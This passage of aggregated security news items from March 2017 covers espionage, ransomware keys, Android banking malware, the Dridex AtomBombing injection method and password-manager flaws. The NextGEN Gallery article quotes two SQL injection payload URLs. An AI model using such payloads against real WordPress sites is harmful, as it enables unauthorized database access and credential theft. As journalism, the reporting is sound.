Let’s close with a look at the country most plagued by malware, China it the top with 47.09% of infected machines, followed by Turkey (42.88%) and Taiwan (38.98%).
German foreign intelligence service Spied on Foreign Journalists since 1999
2.3.2017 securityaffairs BigBrothers
A new report from Der Spiegel the German foreign intelligence service spied on journalists from BBC, New York Times and Reuters since 1999.
Journalists from the BBC, Reuters and New York Times were among those spied on by
The German foreign intelligence service spied on journalists from various media agencies, including the BBC, Reuters and the New York Times.
German foreign intelligence service
According to the German magazine Der Spiegel, the number of reporters spied by the Bundesnachrichtendienst (BND) is at least 50 and the agencies is carrying out surveillance activities since 1999.
“Germany’s foreign intelligence agency, the BND, apparently spied on large numbers of foreign journalists overseas over the course of several years, including employees of the BBC, Reuters and the New York Times. Critics see a massive violation of press freedoms.” reads the Der Spiegel.
Der Spiegel obtained BND documents listing journalists’ emails, faxes, and telephone numbers.
“The document reportedly showed more than a dozen BBC journalists were being monitored via numbers at the organisation’s London headquarters and in Afghanistan.” reported the Independent.
The list also included several mobile and satellite phone numbers used by reporters at Reuters and a New York Times phone number. Reuters news agency in Afghanistan,
The numbers of the Reuters news agency belongs to journalists in Afghanistan, Pakistan, and Nigeria, but according to the Der Spiegel, other organisations in Kuwait, Lebanon, India, Nepal, Indonesia, and Zimbabwe were targeted by the cyber spies.
Of course, news Agency and broadcasters spied by the German foreign intelligence service expressed disappointment over the revelations.
“We are disappointed to hear these claims,” a BBC spokesperson said.
“The BBC’s mission is to bring accurate news and information to people around the world, and our journalists should be able to operate freely and safely, with full protection for their sources.
“We call upon all governments to respect the operation of a free press.”
The BND has refused to comment the allegations anyway it clarified that every operative aspect of its activity will be discussed only with the German government and politicians on parliament’s intelligence oversight committee.
The reports have been revealed while the Bundestag is investigating surveillance activities conducted by the US National Security Agency (NSA) and BND.
Alleged Master Keys for the Dharma Ransomware Leaked on BleepingComputer
2.3.2017 securityaffairs Virus
Good news for the victims of the Dharma Ransomware, someone has released the alleged Master Keys on the BleepingComputer.com forums.
The alleged Master Keys for the Dharma Ransomware has been released by someone on BleepingComputer.com forums.
A member using the online moniker ‘gektar‘ published a post containing a Pastebin link to a header file in C programming languages that supposedly contains the master decryption keys.
Source: BleepingComputer.com
The post was created under the Dharma Ransomware Support Topic.
If the master keys are valid, victims of the Sharma Ransomware can decrypt their files without paying the ransom.
At the time I was writing the authenticity of the keys is still unconfirmed. Experts from Kaspersky are currently verifying them in order to include them in their decryptor tool.
The experts believe the key can be valid because recently the master keys for the Crysis ransomware were also released, and the Dharma ransomware is based on it.
“With that said, there is a good chance that the keys are valid. This is because the keys for Crysis, on which Dharma is based, were released in the same manner on our forums in the past. Using these keys Kaspersky was able to update their ransomware decryptor to help Crysis victims for free.” reported a blog post published on BleepingComputer.
It is still unclear if the person who posted the decryption keys is affiliated with the ransomware.
Bankovní malware se v Google Play maskoval za aplikaci předpovědi počasí
2.3.2017 Novinky/Bezpečnost Viry
Pět tisíc uživatelů mobilních zařízení s operačním systémem Android si začátkem února stáhlo z oficiálního obchodu Google Play škodlivou aplikaci, která zneužívá internetové bankovnictví.
Škodlivá aplikace se objevila v nabídce Google Play 4. února a byla stažena po pouhých dvou dnech, kdy na ni upozornila společnost ESET. Její analytici detekovali hrozbu jako Trojan.Android/Spy.Banker.HU~~pobj. Aplikace se chovala jako skutečný nástroj na předpověď počasí, zároveň ale byla schopna na dálku zamknout nebo odemknout infikované zařízení a zachytit odesílané i přijímané textové zprávy.
Jakmile si uživatel tuto aplikaci stáhl do svého zařízení, ikona předpovědi počasí zmizela a infikovaný přístroj zobrazil falešnou obrazovku s požadavkem na aktualizaci operačního systému zařízení.
Pokud uživatel vyplnil formulář, včetně požadavku na změnu hesla pro odemykání a zamykání displeje, vydal svůj chytrý telefon všanc útočníkovi. Malware nicméně pracoval skrytě na pozadí, ovládaný vzdáleným řídícím serverem, aniž by o tom uživatel mobilního telefonu musel vědět.
Krade přihlašovací údaje k účtům
Malware je tak zákeřný, že ve chvíli, kdy uživatel spustí některou z aplikací internetového bankovnictví, zobrazí falešnou přihlašovací stránku a získá tak od oběti přihlašovací údaje k jejímu bankovnímu účtu. Díky tomu, že dokáže odchytit odesílané i přijímané textové zprávy, dokáže obejít i dvoufaktorovou autentizaci, tedy jednorázově vygenerované heslo, kterým uživatel prokazuje svoji totožnost při přihlašování k účtu přes internet.
Škodlivá aplikace nese název Good Weather a v současné době ji už v obchodu Google Play nelze stáhnout. Vyskytuje se v něm pouze legitimní aplikace téhož názvu od vývojáře AsdTm. Přesto mohou existovat uživatelé, kteří si stihli stáhnout škodlivou verzi.
Jak ji rozeznají od té správné? „Pokud jste si začátkem února stáhli aplikaci Good Weather a nejste si jisti, zda nejde zrovna o její škodlivou verzi, zkontrolujte si, zda máte na displeji telefonu žlutou ikonu s mrakem, který částečně zakrývá slunce. Tato aplikace je v pořádku. Škodlivá aplikace má modrou kruhovou ikonu, v níž je bílý mrak,“ popisuje Miroslav Dvořák, technický ředitel společnosti ESET.
Jak se zbavit škodlivé aplikace?
Infikované zařízení lze zbavit škodlivé aplikace za pomoci některého z mobilních antivirových programů. Pokud ji uživatel chce odinstalovat ručně, musí nejprve deaktivovat práva trojanu ke správě zařízení.
Poté lze škodlivou aplikaci odinstalovat pomocí Nastavení -> Aplikace -> Good Weather. „Je pravděpodobné, že se tato škodlivá aplikace bude vyskytovat ještě v některých neoficiálních obchodech s aplikacemi pro Android. Uživatelé by raději měli používat oficiální zdroj Google Play,“ radí Miroslav Dvořák.
Jak však prokázal tento i některé dřívější případy, i v Google Play se mohou vyskytnout zavirované aplikace. Uživatel by se proto měl vždy ujistit o tom, že zná všechna oprávnění, která by mohla aplikace uplatnit po stažení do jeho chytrého mobilního telefonu nebo tabletu. „Důležité je také číst uživatelské názory na tuto aplikaci a její hodnocení,“ podotýká Miroslav Dvořák.
Robots Vulnerable to Cyberattacks: Researchers
1.3.2017 securityweek Vulnerebility
Robots vulnerable to cyberattacks
The software and firmware that bring robots to life are affected by potentially serious vulnerabilities that can allow hackers to remotely take control of the machines, according to an analysis conducted by security firm IOActive.
Robots are increasingly common in homes, businesses, industrial environments, the military and law enforcement, and healthcare organizations. International Data Corporation (IDC) estimated in January that worldwide spending on robotics and related services will reach $188 billion in 2020.
There have been many cases in the past years where people were injured or killed in accidents involving robots, but experts warn that robots could pose a serious threat if they are vulnerable to remote hacker attacks.
IOActive researchers have analyzed home, industrial and business robots from six different vendors: SoftBank Robotics (NAO and Pepper robots), UBTECH Robotics (Alpha 1S and Alpha 2), ROBOTIS (ROBOTIS OP2 and THORMANG3), Universal Robots (UR3, UR5 and UR10), Rethink Robotics (Baxter and Sawyer), and Asratec Corp (V-Sido robot control system).
The researchers have not acquired the actual robots and instead conducted tests on their mobile applications, software and firmware.
IOActive said it identified nearly 50 vulnerabilities in the tested components, but the security firm noted that it did not conduct an in-depth analysis, which suggests that the actual number of weaknesses is likely much higher.
The company has only published a paper providing a non-technical description of the vulnerabilities. Technical details will be made available after vendors have had a chance to address the flaws.
IOActive told SecurityWeek that it has notified all affected vendors, but only four of them have responded so far: SoftBank Robotics, UBTECH Robotics, Universal Robots and Rethink Robotics.
“Just one, SoftBank Robotics, said they were going to fix the issues but without any further details on when and how they are going to do it and what issues they were going to fix,” said Cesar Cerrudo, IOActive’s CTO and one of the paper’s authors. “Then Universal Robots said that our findings were interesting and that they should do something about it without giving any details. The rest haven’t mentioned if they are going to fix the issues or not.”
Robot vulnerabilities and impact
According to IOActive, the robots it has analyzed are affected by various types of vulnerabilities, including problems related to communications, authentication, authorization mechanisms, cryptography, privacy, default configurations, and open source components.
The flaws allow attackers to intercept communications between the robot and the application controlling it, remotely access critical services without a username and password, install malicious software, and extract sensitive information that is not encrypted properly.
Researchers said the vulnerabilities they identified can be exploited for spying via the robot’s camera and microphone, steal personal or business data, and even take control of the machine and cause physical damage or harm.
“Vendors need to start focusing more on security when speeding the latest innovative robot technologies to market or the issue of malfunctioning robots will certainly be exasperated when malicious actors begin exploiting common security vulnerabilities to add intent to malfunction,” Cerrudo said.
Online Fraud in the U.S. Grew Dramatically Post-EMV
1.3.2017 securityweek CyberCrime
The introduction of EMV (Europay, MasterCard, Visa) cards, also known as chip-and-PIN cards, into the U.S. has had the expected effect: with card present fraud more difficult, fraudsters have moved to on-line card-not-present fraud. Domestic online fraud became 79% riskier in 2016 than it had been in 2015, according to figures come from the Forter/MRC Fraud Attack Index (PDF).
Forter, which provides a fraud detection system for merchants, teamed with the Merchant Risk Council (which currently has almost 450 member companies in more than 20 countries) to develop a Fraud Attack Index. This is defined as the 'dollars at risk per $100 of sales'. The 'dollars at risk' combines detected and prevented fraud with actual fraud.
The relative simplicity of cloning non-EMV cards made domestic (ie, US) off-line card-present fraud attractive. This is no longer easy. The introduction of more secure EMV cards has driven fraudsters from card-present to card-not-present fraud -- EMV was never going to eliminate fraud, it was merely going to change its nature. This is shown in the fraud attack index for 2016, rising from $2.7 in Q4 2015 to $4.98 in Q4 2016.
Related: EMV Payment Cards - Salvation or Failure?
"Domestic order fraud," explains Forter's CEO Michael Reitblat, "has increased following the adoption of EMV (microchip cards) in the US. The fraudsters who used to steal and copy or counterfeit cards in the US now find that much harder, since card present transactions are increasingly protected by EMV -- and so have moved online instead." He adds that this has been further fueled by an increase in 'friendly fraud' or 'liar-buyer' fraud (where a person might buy an item and then report it undelivered in order to obtain a refund). "That's always been a trend," he said, "but it's increasingly moving from an occasional thing to a serious, serial problem for many retailers."
The greater part of international fraud against US merchants has always been on-line; and is always a higher risk than domestic fraud. In absolute terms, it decreased by 13% compared to 2015 but is still 62.4% riskier than domestic fraud, despite the domestic switch from off-line to on-line fraud within the US. Forter puts the international decrease to a growth in genuine international orders rather than a decrease in fraud.
For online fraud, the criminals need to obtain the victims' payment credentials. Forter notes a shift in account takeover (ATO) against merchant sites to ATO against online payment accounts. "A growing recent trend in the realm of account takeover (ATO)," says the report, "is the use of hacked online payment accounts such as PayPal, ApplePay, AndroidPay etc. In these attacks the fraudster breaks into the victim's account and uses the details there, including payment details, to make purchases and take actions as if they were the victim."
ATO on merchant websites is down 16% on the previous year; ATO on online payment accounts is up 131%.
Forter puts this shift down to improvements in merchants' cyber security combined with the 'unprecedented data breaches of the last few years.' These "included account and password information and this, combined with the fact that many consumers continue to reuse passwords across multiple accounts, has made this form of attack easier to carry out."
"It's an example of the speed at which fraudsters adapt to moves made to stop their attempts," explained Reitblat. "Merchants realized that ATO was a problem, and started guarding against it -- so fraudsters shifted, using similar tactics against online payment accounts, which is far harder for merchants to spot, and which in any event gives them greater scope for theft."
The big target in this shift to online fraud has been clothing -- apparel. Attacks against apparel rose 69.9% over 2016. "This is partly due to fraudsters who are moving online post-EMV continuing to operate in an industry with which they are comfortable," explains Reitblat. With card-present fraud, it is easy to walk into a shop, conduct the fraudulent transaction, and walk out with the clothes.
However, he added that it is also "partly because fraudsters who have been focusing on luxury goods for years (due to the high ROI they represent) are trying a new tactic. Rather than go for the low end of luxury goods (which retailers are now aware that they need to protect and scrutinize, as well as the high-end ones), they're getting equivalent products from apparel sites which are often less careful since they have not traditionally been major targets in the same ways that luxury sites have been."
SQLi flaw in the NextGEN Gallery plugin exposes at risk of hack more than 1 Million WordPress Installs
1.3.2017 securityaffairs Vulnerebility
More than 1 million WordPress website are at risk due to a critical SQL injection vulnerability in the NextGEN Gallery plugin. Update it asap.
Security experts at Sucuri firm have identified a SQL injection flaw in the WordPress image gallery NextGEN Gallery that could be exploited by a remote to gain access to the targeted website’s backend, including sensitive data such as passwords and secret keys.
Hackers can trigger the flaw to access the database and steal sensitive data, including passwords and secret keys.
“While working on the WordPress plugin NextGEN Gallery, we discovered a severe SQL Injection vulnerability. This vulnerability allows an unauthenticated user to grab data from the victim’s website database, including sensitive user information.” reads the analysis published by Sucuri.
The WordPress plugin NextGEN doesn’t validate the user input, for this reason, the development team has fixed the bug releasing the version 2.1.79.
“From the source code, we notice the $container_ids string is created from tag input and its values are not properly sanitized. They are safe from SQL injection but wouldn’t prevent arbitrary format string directives/input from being inserted, which may cause issues with the WordPress database abstraction prepare() method.” noticed the experts.
According to the analysis published by the security firm, there are two different attack scenarios for the exploitation of the flaw:
The website administrator uses a NextGEN Basic TagCloud Gallery on the website. In this scenario, the attacker can execute SQL queries by modifying the URL of the gallery.
The website administrator allows users to submit posts to be reviewed (contributors). In this case, an authenticated attacker can execute malicious code via shortcodes.
NextGEN Gallery plugin flaw
An unauthenticated attacker could add extra sprintf/printf directives to the SQL query and exploit the $wpdb->prepare’s behavior to add its code to the executed query.
The researchers also shared some examples of the final attack payloads that would look like the following ones:
http://target.url/2017/01/17/new-one/nggallery/tags/test%251%24%25s))%20or%201=1%23
http://target.url/2017/01/17/new-one/nggallery/tags/test%251%24%25s))%20or%201=2%23
The good news is that the flaw in the NextGEN Gallery hasn’t been exploited in the wild, but it is easy to predict a spike in the number of attacks leveraging the flawed plugin.
The flaw in the NextGEN Gallery is very serious due to the huge number of websites that use it, the popular WordPress image gallery plugin has more than 1 million active installations.
WordPress continues to be a privileged target for hackers, a critical flaw patched in WordPress in January has been exploited against a large number of websites.
Once again … Never trust the input!
The Gamaredon Group is back with new weapons in its arsenal
1.3.2017 securityaffairs Cyber
The Russian state-actor dubbed Gamaredon is back and has been using a custom-developed malware in a new cyber espionage campaign.
According to the experts from Palo Alto Networks, a Russian state-actor dubbed Gamaredon has been using a custom-developed malware in cyber espionage campaign on the Ukrainian government, military and law enforcement officials.
The Gamaredon APT was first spotted in 2013, last year researchers at LookingGlass have shared the details of a cyber espionage campaign, tracked as Operation Armageddon, targeting Ukrainian entities.
The Security Service of Ukraine (SBU) blamed the Russia’s Federal Security Service (FSB) for the cyber attacks. The Gamaredon group leveraged on spear-phishing emails to deliver common remote access tools (RATs), such as UltraVNC and Remote Manipulator System (RMS).
Back to the present, researchers from Palo Alto Networks discovered that threat actors behind the Gamaredon APT group have started using a new, custom-built malware instead of common RATs.
“In the past, the Gamaredon Group has relied heavily on off-the-shelf tools. Our new research shows the Gamaredon Group have made a shift to custom-developed malware.” reads the analysis published by PaloAlto Networks.
Below the main featured implemented in the custom-developed malware:
A mechanism for downloading and executing additional payloads of their choice
The ability to scan system drives for specific file types
The ability to capture screenshots
The ability to remotely execute commands on the system in the user’s security context
The new malware appears very sophisticated and it is able to avoid the detection of security solutions
The experts are not sure the latest attacks are also part of the Operation Armageddon or if the threat actors have started a new cyber espionage campaign.
“Antimalware technologies have a poor record of detecting the malware this group has developed. We believe this is likely due to the modular nature of the malware, the malware’s heavy use of batch scripts, and the abuse of legitimate applications and tools (such as wget) for malicious purposes.” reads the analysis published by Palo Alto Networks.
In February 2016, the researchers identified another custom tool, tracked as Pteranodon, that was added in self-extracting archives (SFX) used by the Gamaredon group.
While Gamaredon has started using new malware, it still relies on self-extracting archives (SFX) and much of the same infrastructure as when its activities were first analyzed.
Amazon S3 outage. Increased error rates. Amazon AWS is down
1.3.2017 securityaffairs Vulnerebility
An Amazon AWS S3 outage is causing serious problems for a huge number of websites, applications, and Internet of Things devices.
The Amazon S3 web-based storage service is experiencing serious widespread issues. Web services and mobile apps leveraging on Amazon S3 suffered a significant outage.
According to the company, the Amazon S3 outage was caused by “high error rates with S3 in US-EAST-1.”
Follow
Amazon Web Services ✔ @awscloud
We continue to experience high error rates with S3 in US-East-1, which is impacting some other AWS services.
8:56 PM - 28 Feb 2017
458 458 Retweets 284 284 likes
“We have now repaired the ability to update the service health dashboard. The service updates are below. We continue to experience high error rates with S3 in US-EAST-1, which is impacting various AWS services. We are working hard at repairing S3, believe we understand rootcause , and are working on implementing what we believe will remediate the issue.” reads the statement published on the AWS service health dashboard.
Many websites were affected by the Amazon S3 outage, including Quora, Imgur, Medium, Business Insider, filesharing in Slack, and many others.
Amazon S3 service is used by a large number of service to store data online, including Runkeeper, Yahoo webmail and Trello.
Amazon S3 outage also affected IoT devices backed by the Amazon service, such as connected thermostats and lightbulbs, users were not able to control their devices.
According to data tracked by SimilarTech, Amazon S3 is used by more than 148,000 websites and 120,oo0 unique domains, mostly in the US. 0.8 percent of the top 1 million websites leverage on the Amazon service.
Amazon S3 outage
The users are angry, AWS still continue to downplay the issue classifying it as a case of “increased error rates.”
The status dashboard for AWS shows all green ticks at time of writing, but users are still facing the Amazon S3 outage.
“We’ve identified the issue as high error rates with S3 in US-EAST-1, which is also impacting applications and services dependent on S3. We are actively working on remediating the issue,” states AWS.
Dridex v4, the dreaded malware has been improved with AtomBombing technique
1.3.2017 securityaffairs Virus
Malware author are using Dridex v4 in the wild, an improved version of the Trojan that includes a new injection method known as AtomBombing.
According to researchers with IBM X-Force, vxers have improved the Dridex banking Trojan adding a new injection method for evading detection, the technique is known as AtomBombing.
The researchers have spotted a new sample of the threat, so called Dridex v4, earlier this month. The malware was used in campaigns against banks in UK and experts believe it will be used to target financial institution worldwide very soon.
“IBM X-Force discovered that Dridex, one of the most nefarious banking Trojans active in the financial cybercrime arena, recently underwent a major version upgrade that is already active in online banking attacks in Europe.” reads the analysis published by IBM.
“In this release, we noted that special attention was given to dodging antivirus (AV) products and hindering research by adopting a series of enhanced anti-research and anti-AV capabilities. The changes to Dridex’s code injection method are among the most significant enhancements in v4. They allow Dridex to propagate in the infected endpoint with minimal calls to marked API functions.”
The Dridex v4 maintained the capabilities observed in a previous release, it is a malware focused on banking activities, it monitors the victim’s online banking operations and steals login and account information.
The code injection method was significantly improved because previous versions have become too easy to detect due to the use of well known API calls, that’s why the authors leverage AtomBombing in a new version of Dridex.
The AtomBombing is not a novelty in the threat landscape, in October, security experts from security firm ENSILO have devised the method to inject malicious code in Windows operating system that could not be detected by modern anti-malware tools.
The Atom Tables are data structures used by the operating system to store strings with an identifier to access them, they could have a global or local scope.
“AtomBombing makes use of Windows’ atom tables and the native API NtQueueApcThread to copy a payload into a read-write memory space in the target process,” according to the report authors. “It then uses NtSetContextThread to invoke a simple return-oriented programming chain that allocates read/write/execute memory, copies the payload into it and executes it. Finally, it restores the original context of the hijacked thread.”
“An atom table is a system-defined table that stores strings and corresponding identifiers. An application places a string in an atom table and receives a 16-bit integer, called an atom, that can be used to access the string. A string that has been placed in an atom table is called an atom name.” reads a description published by Microsoft on the Atom Tables.
“The system provides a number of atom tables. Each atom table serves a different purpose. For example, Dynamic Data Exchange (DDE) applications use the global atom table to share item-name and topic-name strings with other applications.”
The attackers can then write malicious code into an atom table and force a legitimate application to retrieve it from the table. Once the code is retrieved by the legitimate application, it is possible to manipulate it triggering the execution of the malicious code.
Back to Dridex v4, the authors leverage on the AtomBombing technique to hide the malicious payload in the Atom Tables.
“In our analysis of the new Dridex v4 release, we discovered that the malware’s authors have devised their own injection method, using the first step of the AtomBombing technique. They use the atom tables and NtQueueAPCThread to copy a payload and an import table into a RW memory space in the target process. But they only went halfway — they used the AtomBombing technique for the writing of the payload, then used a different method to achieve execution permissions, and for the execution itself.” reads the analysis shared by IBM.
This implementation of the AtomBombing technique is unique for banking malware coding, and it isn’t the only one for Dridex v4.
Other improvements include the enhancement to the encryption for its configuration, a modified naming algorithm, and an updated mechanism to gain persistence on the infected machine.
The evolution of the Dridex Trojan continues, last time we read about this threat was in January when researchers at Flashpoint discovered a new variant leveraging a new tactic to bypass the UAC (User Account Control).
XSS flaws in Zscaler Cloud management software allow logged attackers to hack coworkers
1.3.2017 securityaffairs Vulnerebility
Zscaler has fixed persistent XSS vulnerabilities affecting Zscaler Cloud management software that allow logged attackers to hack coworkers.
Serious cross-site scripting (XSS) flaws in the Zscaler Cloud management software could be exploited by attackers to inject malicious HTML and JavaScript into the browsers of other users who visit the portal.
In order to exploit the flaws, the attacker needs to be logged into the website, then he can take over the accounts of other users and act on their behalf.
Zscaler highlighted that the flaws would only expose the hack users within the same organization, this means that an attacker can only inject code into the webpages of coworkers while they were accessing the Zscaler’s admin portal.
“Zscaler has addressed persistent XSS vulnerabilities identified in admin.zscaler[X].net and mobile.zscaler[X].net portals. The post-auth vulnerabilities would have allowed authenticated admin users to inject client-side content into certain admin UI pages which could impact other admin users of the same company.” reads the security advisory shared by Zscaler. “Zscaler would like to thank Alex Haynes for responsibly reporting the issues and working with Zscaler to ensure that they were properly remediated.”
Cross-site scripting flaws are wrongly considered minor issues, but they are very insidious and easy to spot also with XSS scanners.
XSS attacks occur when an attacker uses a web application to send malicious code (i.e. browser side script) to a different end user. For further information, I suggest you visit the OWASP website.
Dridex Banking Trojan Gains ‘AtomBombing’ Code Injection Ability to Evade Detection
1.3.2017 thehackernews Virus
Security researchers have discovered a new variant of Dridex – one of the most nefarious banking Trojans actively targeting financial sector – with a new, sophisticated code injection technique and evasive capabilities called "AtomBombing."
On Tuesday, researchers with IBM X-Force disclosed new research, exposing the new Dridex version 4, which is the latest version of the infamous financial Trojan and its new capabilities.
Dridex is one of the most well-known Trojans that exhibits the typical behavior of monitoring a victim's traffic to bank sites by infiltrating victim PCs using macros embedded in Microsoft documents or via web injection attacks and then stealing online banking credentials and financial data.
However, by including AtomBombing capabilities, Dridex becomes the first ever malware sample to utilize such sophisticated code injection technique to evade detection.
What is "AtomBombing" Technique?
Code injection techniques by previous versions of Dridex Trojan have become too common and easy to spot by antivirus and other security solutions.
But since the AtomBombing technique is a different approach to code injection that does not rely on easy-to-detect API calls used by old Dridex versions, leveraging AtomBombing in the latest Dridex version made it difficult for antiviruses to detect.
Initially spotted in October by Tal Liberman from enSilo security firm, AtomBombing is a code injection technique that could allow attackers to inject malicious code on every version of Microsoft's Windows OS, even Windows 10, in a manner that no existing anti-malware tools can detect.
AtomBombing does not exploit any vulnerability but abuses the system-level Atom Tables, a feature of Windows that allows applications to store information on strings, objects, and other types of data to access on a regular basis.
An attacker can write malicious code into an atom table and trick legitimate applications into retrieving it from the table to execute malicious actions on nearly any Windows operating system released in the past 16 years.
Dridex Version 4 Discovered In the Wild
According to IBM X-Force researchers, the Dridex banking Trojan recently underwent a major version upgrade, now supporting AtomBombing.
But the malware author only went halfway which makes Dridex v4 different from other AtomBombing attacks — the attackers used "the AtomBombing technique for the writing of the payload, then used a different method to achieve execution permissions, and for the execution itself."
"The flow differs from the one described in the AtomBombing technique. To get the payload into an executable memory space, Dridex simply calls NtProtectVirtualMemory from the injecting process to change the memory where the payload is already written into RWX," X-Force researchers said.
Since using an APC call to the payload would have been very suspicious that could be detected and stopped, Dridex v4 uses "the same GlobalGetAtomW method to patch GlobalGetAtomA, hooking it to execute the payload."
Researchers said the new Dridex v4 is already in use in active campaigns against European banks, and it's only a matter of time before hackers begin targeting American financial institutions as well.
Antivirus software and security products can now implement their systems to track and prevent Dridex v4 attacks since the IBM's findings are available for all.
For a more detailed explanation and technical working of the latest version of Dridex Trojan, you can head on to IBM's blog post.
9 Popular Password Manager Apps Found Leaking Your Secrets
1.3.2017 thehackernews Security
Is anything safe? It's 2017, and the likely answer is NO.
Making sure your passwords are secure is one of the first line of defense – for your computer, email, and information – against hacking attempts, and Password Managers are the one recommended by many security experts to keep all your passwords secure in one place.
Password Managers are software that creates complex passwords, stores them and organizes all your passwords for your computers, websites, applications and networks, as well as remember them on your behalf.
But what if your Password Managers itself are vulnerable?
Well, it's not just an imagination, as a new report has revealed that some of the most popular password managers are affected by critical vulnerabilities that can expose user credentials.
The report, published on Tuesday by a group of security experts from TeamSIK of the Fraunhofer Institute for Secure Information Technology in Germany, revealed that nine of the most popular Android password managers available on Google Play are vulnerable to one or more security vulnerabilities.
Popular Android Password Manager Apps Affected By One Or More Flaws
The team examined LastPass, Keeper, 1Password, My Passwords, Dashlane Password Manager, Informaticore's Password Manager, F-Secure KEY, Keepsafe, and Avast Passwords – each of which has between 100,000 and 50 Million installs.
"The overall results were extremely worrying and revealed that password manager applications, despite their claims, do not provide enough protection mechanisms for the stored passwords and credentials," TeamSIK said.
In each application, the researchers discovered one or more security vulnerabilities – a total of 26 issues – all of which were reported to the application makers and were fixed before the group's report went public.
Encryption Keys for Master Key Hard-Coded in the App's Code
According to the team, some password manager applications were vulnerable to data residue attacks and clipboard sniffing. Some of the apps stored the master password in plain text or even exposed encryption keys in the code.
For example, one high severity flaw affected Informaticore's Password Manager app, which was due to the app storing the master password in an encrypted form with the encryption key hard coded in the app's code itself. A similar bug was also discovered in LastPass.
In fact, in some cases, the user's stored passwords could have easily been accessed and exfiltrated by any malicious application installed on the user's device.
Besides these issues, the researchers also found that auto-fill functions in most password manager applications could be abused to steal stored secrets through "hidden phishing" attacks.
And what's more worrisome? Any attacker could have easily exploited many of the flaws discovered by the researchers without needing root permissions.
List of Vulnerable Password Managers and Flaws Affecting Them
Here's the list of vulnerabilities disclosed in some of the most popular Android password managers by TeamSIK:
MyPasswords
Read Private Data of My Passwords App
Master Password Decryption of My Passwords App
Free Premium Features Unlock for My Passwords
1Password – Password Manager
Subdomain Password Leakage in 1Password Internal Browser
HTTPS downgrade to HTTP URL by default in 1Password Internal Browser
Titles and URLs Not Encrypted in 1Password Database
Read Private Data From App Folder in 1Password Manager
Privacy Issue, Information Leaked to Vendor 1Password Manager
LastPass Password Manager
Hardcoded Master Key in LastPass Password Manager
Privacy, Data leakage in LastPass Browser Search
Read Private Data (Stored Master password) from LastPass Password Manager
Informaticore Password Manager
Insecure Credential Storage in Microsoft Password Manager
Keeper Password Manager
Keeper Password Manager Security Question Bypass
Keeper Password Manager Data Injection without Master Password
Dashlane Password Manager
Read Private Data From App Folder in Dashlane Password Manager
Google Search Information Leakage in Dashlane Password Manager Browser
Residue Attack Extracting Master Password From Dashlane Password Manager
Subdomain Password Leakage in Internal Dashlane Password Manager Browser
F-Secure KEY Password Manager
F-Secure KEY Password Manager Insecure Credential Storage
Hide Pictures Keepsafe Vault
Keepsafe Plaintext Password Storage
Avast Passwords
App Password Stealing from Avast Password Manager
Insecure Default URLs for Popular Sites in Avast Password Manager
Broken Secure Communication Implementation in Avast Password Manager
Researcher also going to present their findings at HITB conference next month. For more technical details about each vulnerability, users can head on to the TeamSIK report.
Since the vendors have addressed all these above-listed issues, users are strongly advised to update their password manager apps as soon as possible, because now hackers have all the information they require to exploit vulnerable versions of the password manager apps.
Zapomeňte na VPN, máme lepší ochranu, tvrdí Cisco
1.3.32017 SecurityWorld Zabezpečení
Řešení Umbrella, bezpečnou internetovou bránu, která dokáže uživatele ochránit přímo z cloudu, uvedlo na trh Cisco.
Výrobce tak podle svých slov reaguje na změny pracovního procesu a umožňuje i ochranu podnikových zařízení, která jsou připojena k jiné než firemní síti bez využití virtuálních privátních sítí (VPN).
Brána funguje jako bezpečný vstup do internetu a chrání zařízení bez ohledu na to, kde se v daném okamžiku uživatel nachází nebo k jaké síti se snaží připojit.
Většina z firem spoléhá při vzdálené práci na využití virtuálních privátních sítí (VPN), avšak podle průzkumu IDG až 82 % mobilních zaměstnanců připouští, že se ne vždy připojuje prostřednictvím VPN. Umbrella by měla těmto rizikům zabránit.
„Umbrella poskytuje uživatelům bezpečný přístup ze všech míst, a to i bez připojení prostřednictvím VPN. Firma tak má jistotu, že jsou podniková zařízení chráněná bez ohledu na to, jakým způsobem a z jakého místa se zaměstnanci připojují,“ tvrdí Milan Habrcetl, bezpečnostní expert společnosti Cisco.
Umbrella blokuje známé i nově vznikající hrozby na všech portech a protokolech. Kromě toho brání přístupu ke škodlivým doménám, URL, IP adresám a souborům před navázáním spojení či stažením škodlivého obsahu.
Vzhledem k tomu, že většina hrozeb cílí na koncové body, je nezbytné podchytit všechny porty a protokoly a vytvořit bezpečnostní síť, která pokryje 100 % provozu.
Umbrella přitom vysoké nároky na provoz neklade - tím, že vše probíhá v cloudu, odpadá instalace veškerého hardwaru a manuální aktualizace softwaru. Podniky tak prý mohou zajistit ochranu všech zařízení v řádu minut.
Novinka využívá mj. existující nástroje Cisco – například modely založené na strojovém učení odhalující známé i nově vznikající hrozby a blokující připojení ke škodlivým destinacím na úrovni DNS a IP adresy, informace od bezpečnostního týmu Talos k blokování škodlivých URL na úrovni HTTP/S či ochranu proti pokročilému škodlivému softwaru Advanced Malware Protection (AMP) odhalující škodlivé soubory, které následně v cloudu zablokuje.
Umbrella lze navíc integrovat se stávajícími systémy, což umožňuje uživatelům rozšířit ochranu na zařízení a lokality mimo podnikový perimetr.
Umbrella využívá směrování typu „anycast“, kdy každé datové centrum hlásí shodnou IP adresu, takže jsou požadavky transparentně zasílány do aktuálně nejrychleji dostupného DC s automatickým předáváním při selhání.
Nákaza ransomwarem v Androidu raketově roste
1.3.32017 SecurityWorld Viry
Rekordní nárůst detekcí ransomware na zařízeních s operačním systémem Android za rok 2016 hlásí výzkumníci Esetu. Jde o typ škodlivého kódu, který různými způsoby zablokuje zařízení a za jeho odblokování žádá od oběti výkupné a loni dosáhl o historicky nejvyššího počtu pokusů o infikování.
„I když jsme celkově zaznamenali nárůst detekcí malwaru na Androidu přibližně o 20 procent, útoky ransomwaru na tuto platformu rostou mnohem rychleji. Nejvyšší nárůst byl v první polovině roku 2016, rozhodně bychom si ale nedovolili říci, že tato hrozba v dohledné době pomine,“ říká technologický ředitel Esetu Juraj Malcho.
Autoři lockscreenů (škodlivý kód, který uzamkne displej mobilního zařízení) a crypto-ransomware (škodlivý kód, který zašifruje obsah zařízení) využili uplynulý rok k tomu, aby zkopírovali techniky šíření, které používají druhy malware útočící na počítače.
Vyvinuli ale také sofistikované metody, které se zaměřují na technologie specifické pro Android. Kyberzločinci se zároveň zaměřili na to, aby nevyčnívali tím, že škodlivý kód šifrují a nebo ho skrývají hlouběji do infikovaných aplikací.
